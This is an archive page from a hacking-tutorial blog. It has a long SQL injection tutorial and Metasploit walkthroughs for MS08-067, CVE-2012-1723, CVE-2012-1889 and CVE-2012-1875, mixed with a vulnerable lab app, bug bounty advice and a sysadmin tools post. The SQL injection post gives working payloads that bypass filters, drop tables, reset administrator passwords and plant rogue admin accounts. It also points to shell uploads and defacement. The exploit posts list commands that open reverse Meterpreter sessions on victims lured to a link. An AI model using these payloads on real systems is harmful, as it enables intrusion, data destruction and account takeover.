Showing posts with label PenTesting Tutorials. Show all posts
Showing posts with label PenTesting Tutorials. Show all posts

Tuesday, December 17, 2013

BTS PenTesting Lab - a vulnerable web application to learn common vulnerabilities


The most common question from students who is learning website hacking techniques is "how to test my skills legally without getting into troubles?". Here is solution for you guys, you can learn web application Pentesting with our New app "BTS Pentesting Lab".


BTS PenTesting Lab is a vulnerable web application that allows you to learn from basic to advanced  vulnerability techniques.

Currently, the app contains following vulnerability types:

  • SQL Injection
  • Cross Site scripting(XSS)
  • Cross Site request Forgery(CSRF)
  • Clickjacking
  • Server Side Request Forgery(SSRF))
  • File Inclusion(RFI and LFI)
  • Remote Code Execution

Download the latest version of BTS Lab
https://sourceforge.net/projects/btslab/files/latest/download


How to run BTS PenTesting Lab?
1. Install XAMPP or WAMPP in your machine
2. Extract the zip file into the htdocs folder (make sure to rename the folder to "btslab").
3.  Open the "http://localhost/btslab/setup.php" url in your browser.
4. Click the Setup.

That's all Now you can start to use the app at "http://localhost/btslab" :)

In next update, i will add more vulnerability types and advanced techniques.  My next articles will be based on this app :)
Continue   Reading>>

Wednesday, December 11, 2013

New XSS Cheat Sheet - Bypassing Modern Web Application Firewall XSS Filters



While we doing web application penetration testing for our clients, we may some time have to face the Web application Firewall that blocks every malicious request/payload.

There are some Cheat sheets available on internet that helped to bypass WAF in the past. However, those cheats won't work with the modern WAFs and latest browsers. 

So, here is need for creating new Cheat sheet.

One of the top security researcher Rafay Baloch has done an excellent job by organizing his own techniques to bypass modern WAFs and published a white paper on that.

The paper titled "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" covers only the techniques needed for bypassing XSS filters.

Rafay promised to write other vulnerabilities' bypassing techniques in his next paper.

You can download the WhitePaper from here.
Continue   Reading>>

Saturday, February 23, 2013

SQL Injection Tutorial: All common SQL injection problems and Solutions



Hello readers of BTS,
    Today I'll write an tutorial for you what covers most problems while doing SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone are writing tutorials about SQL, but nobody covers the problems what will come with that attack.

What is the cause of most problems related to SQL injection?

Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should.

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

If you're interested about WAF's and how they're working then I suggest to read it from wikipedia http://en.wikipedia.org/wiki/Application_firewall


Order by is being blocked?


It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reasons. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF.

If that request will return 'forbidden' then it means it's blocked.
http://site.com/gallery?id=1 order by 100--
Then you have to try to use Group by and it will return correct :
http://site.com/gallery?id=1 group by 100-- / success
Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably recive an error like this : Operand should contain 5 column(s).

That error means there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the further injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--

'order by 10000' and still not error?

That's an small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here's the injection method is just a littlebit different. When I saw that on my first time then I thought how does a Database have 100000 columns because I'm not getting the error while the site is vulnerable?

The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injecting isn't working.

Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter +

Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example.

http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

Extracting data from other database.

Sometimes we can inject succesfully and there doesn't appear any error, it's just like a hackers dream. That dream will end at the moment when we'll see that there doesn't exist anything useful to us. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we have found the information we're looking for, you should still take a look in the other databases also.

This will give you Schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x

I get error if I try to extract tables.


site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--


How to bypass WAF/Web application firewall

The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time.

"404 forbidden you do not have permission to access to this webpage"

The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]

Change the url Like it's below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]

Is it possible to modify the information in the database by SQL injection?

Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one?

Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator?

You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up.

Theory is almost over and now let's get to the practice.

Let's say that we're visiting that page and it's vulnerable to SQL injection.

http://site.com/news.php?id=1


You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it?

http://site.com/news.php?id=1; DROP TABLE news

That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials.

Let's head to the next statement what's UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--

Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life :

http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--

We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.


How does INSERT work?


Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--

INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database what exact information we want to add, ('login_id', 'login_name', 'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name, password and details and those are the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add new account, password to it, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is opening up the Administrator page and login.

Passwords aren't working

Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password, but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials has been left in the database after removing the login page, sometimes the real credentials has been transfered to another database and old entries hasn't been deleted.

Sometimes i get some weird password

This weird password is called Hash and most likely it's MD5 hash.That means the sites admin has added more security to the website and has encrypted the passwords.Most popular crypting way is using MD5 hash.The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com .I don't like to be a person who's pitching around with small details what aren't correct, but here's an tip what you should keep in mind. The domain is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask an hash what's already in their database, you will get the result. :)

Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes what exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked

How to find admin page of site?


Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.

Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's.

Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page.


Automated SQL injection tools.

Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most of people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worstest thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most of people will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're injecting with them and you won't become a real hacker neither. My above text might give you an question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information.I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you.

Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.

What else can I do with SQL injection besides extracting information?

There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count.

What to do if all the information doesn't display on the page?
I actually have really rarely seen that there are so much information on the webpage that it all just don't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hiddened in the source.


What is the purpose of '--' in the union+select+1,2,3,4,5-- ?
I suggest to read about null-byte's and here's a good explanation about it : http://en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used . Purpose of adding -- in the end of the URL isn't always neccesary and it depends on the target. It doesn't have any influence to the injection because it doesn't mean anything, but it's still being used because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed. It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells the DB that "I'm the end of query, don't read anything what comes after me and execute everything infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your sentence and will wait until you write the other part of the sentence and the end will come if you add the dot to your sentence.


Credits:
Every sentence of this article is written by Crackhackforum.com staff Rynaldo.
BTS &BTS readers are really thankful to Rynaldo for submitting such a wonderful article to Break The Security.
Continue   Reading>>

Sunday, February 3, 2013

Disclosing Vulnerabilities: The BUG Bounty Way



After presenting this topic at NULL Bangalore Jan Meet, I got loads of appreciation from various people , and one such appreciation I got was from my friend Sabari Selvan. And that’s why I decided to write an article about the presentation I gave.

This article gives you an insight with hunting bugs, and hopefully it becomes a kick-starter guide for the beginners who want to start off with bug bounty.

Well, today hunting bugs in the wild has become a new trend. Coz almost every company has started a responsible disclosure page and hence allows hackers like us to make some name, fame and money…:P I too was fascinated to start off with bug bounty when I saw my friends around me getting those flashy Facebook Bug Bounty Whitehat Card or when they got a new payment for finding a bug or when they got a new T-Shirt from a company.

Before knowing about BUG BOUNTY, let’s see the types in which the Vulnerability Disclosure is done.

We generally have two ways of disclosing vulnerabilities:

  • Full Disclosure
  • Responsible Disclosure
Full Disclosure is when a person goes onto his blog or any other form of public media and writes about the vulnerability that he discovered in the wild most of the times without informing the company where he found the vulnerability. This would allow various other hackers around the world to exploit this vulnerability. This would sometimes lead to problems because the company where you found the bug has got every right to take legal actions against you for letting out the information.

Responsible Disclosure
Responsible Disclosure is where the person who finds a vulnerability in a website directly tells it to the authorities of that website, so that they can rectify the issue as early as possible. And most of the companies reward them in return for reporting the vulnerability. And this is what is BUG BOUNTY.

Well, bug bounty is indeed really a nice way to earn money. But more than money when your name comes up in their HALL OF FAME or the company’s RESPONSIBLE DISCLOSURE page, then that’s priceless. Coz that is what gives your resume some extra weightage and makes you stand out when compared to your peers.

Books to read before Hunting Bugs:
Well, these are the book I generally recommend anyone who wants to start off with web application pen-testing or particularly BUG BOUNTY.

  • Web Application Hackers Handbook , Second Edition(Considered to be the Bible of Web Application Pen-testers)
  • Hacking- The Art Of Exploitation
  • OWASP Testing Guide v3.0


BUG Hunter’s TOOLKIT:
These are the basic tools that most of the bug hunters generally use and suggest.
Proxy:

  • Burp Suite
  • Web Scarab
  • Fiddler
  • Paros Proxy

Mozilla Firefox is the best browser if you want to hunt bugs. And it is the best one coz of its awesome addons that ease our job.

Mozilla Firefox ADDONS:

  • Tamper Data
  • Web Developer Extensions
  • Live HTTP Headers
  • Firebug
  • XSS Me Sidebar
  • Hackbar
  • And many more...

Other Useful Tools:

  • IRONWASP
  • XENOTIX


Optional Tools:
Camtasia Sreen Recorder and Snipping Tools (Useful for creating Proof Of Concepts).

List Of BUG BOUNTY Programs:
Well here is the link that provides you a BIG list of Bug Bounty Programs and Responsible Disclosure Pages.
http://www.ehackingnews.com/2012/12/list-of-bug-bounty-program-for.html

Other ways to earn BOUNTY:
Recently I came across this new startup called BugCrowd that manage organized Bug Bounty for various companies.

Just register yourself to start off with hunting bugs and earn money.
http://bugcrowd.com/?kid=NG66

It’s a nice initiative indeed where in it’s a win-win situation for everyone. The company gets its site tested from best of the best hackers across the globe and indeed the hackers get paid for finding bugs and reporting it to them.

Anyways, I hope the above article gives enough info to start off with Bug Hunting. Anyways I wish ALL THE BEST to all the beginners who want to start off with Bug Hunting.
Always Remember:

“If you’re good at Something, then never do it for FREE…!!!”
Happy Hunting…;-D
Continue   Reading>>

Wednesday, January 23, 2013

10 System Admin Tools to Help You Secure Your Network


System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems? How are you going to maintain licensing compliance if you don’t know who has installed what from \software? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of PCAnyWhere and several of the web-based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI-based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes. Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source WireShark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good “sniffer” is key to helping secure and analyze systems. There is simply no way that’s more effective to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.
Continue   Reading>>

Wednesday, July 25, 2012

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution




CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:
  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/
Continue   Reading>>

Saturday, July 14, 2012

[Metasploit Tutorial] Hacking Windows XP using IP Address


Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:
  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

CounterMeasures:
Update your OS frequently.

Continue   Reading>>

Wednesday, June 20, 2012

CVE-2012-1889: Microsoft XML Core Services Vulnerability Metasploit Demo


CVE-2012-1889: Microsoft XML Core Services Vulnerability
A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.

An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.

The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list.

The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not.

Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole".

Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set lhost 192.168.56.10

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Type "exploit" in the console.


Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] msxml_get_definition_code_exec - Using msvcrt ROP

[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 192.168.56.12

[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Type "sysinfo" in the meterpreter to get the system information.
Continue   Reading>>

CVE-2012-1875 : Hacking windows using MS12-037 Internet Explorer Same ID Vulnerability


Hi, Today i am going to explain how to hack the Windows system using the recent IE exploit.  This article is intend to educate PenTesters.  If you don't know what Penetration testing means, then please reads this article.  Also please read the previous articles on Pen Testing.

CVE-2012-1875 : MS12-037 Internet Explorer Same ID Vulnerability
Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don't make remote code execution attacks impossible -just trickier.

In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL - one which was compiled before ASLR become the norm, and
therefore doesn't support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.

And DEP is bypassed using a technique known as ROP, or return-oriented programming.

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ):


Requirements:
  • Target OS: XP3
  • Attacker OS : Backtrack or any PenTesting Distros
As usual , you have to create two VMs in your VirtualBox.

Preparing victim system:
Install the XP3 in one of the VM.  Change the VM's Network adapter to the Host-only-adapter. (if you don't know what i am talking about, then please use this Virtualbox manual)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
msfupdate

Or you can download the 'ms12_037_same_id.rb' module and paste in this directory "/opt/metasploit/msf3/modules/exploits/windows/browser/"

Configuring settings for the exploit in Metasploit:
Open the Terminal and type "msfconsole" to get the Metasploit console.

Type " use exploit/windows/browser/ms12_037_same_id" in the console.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp
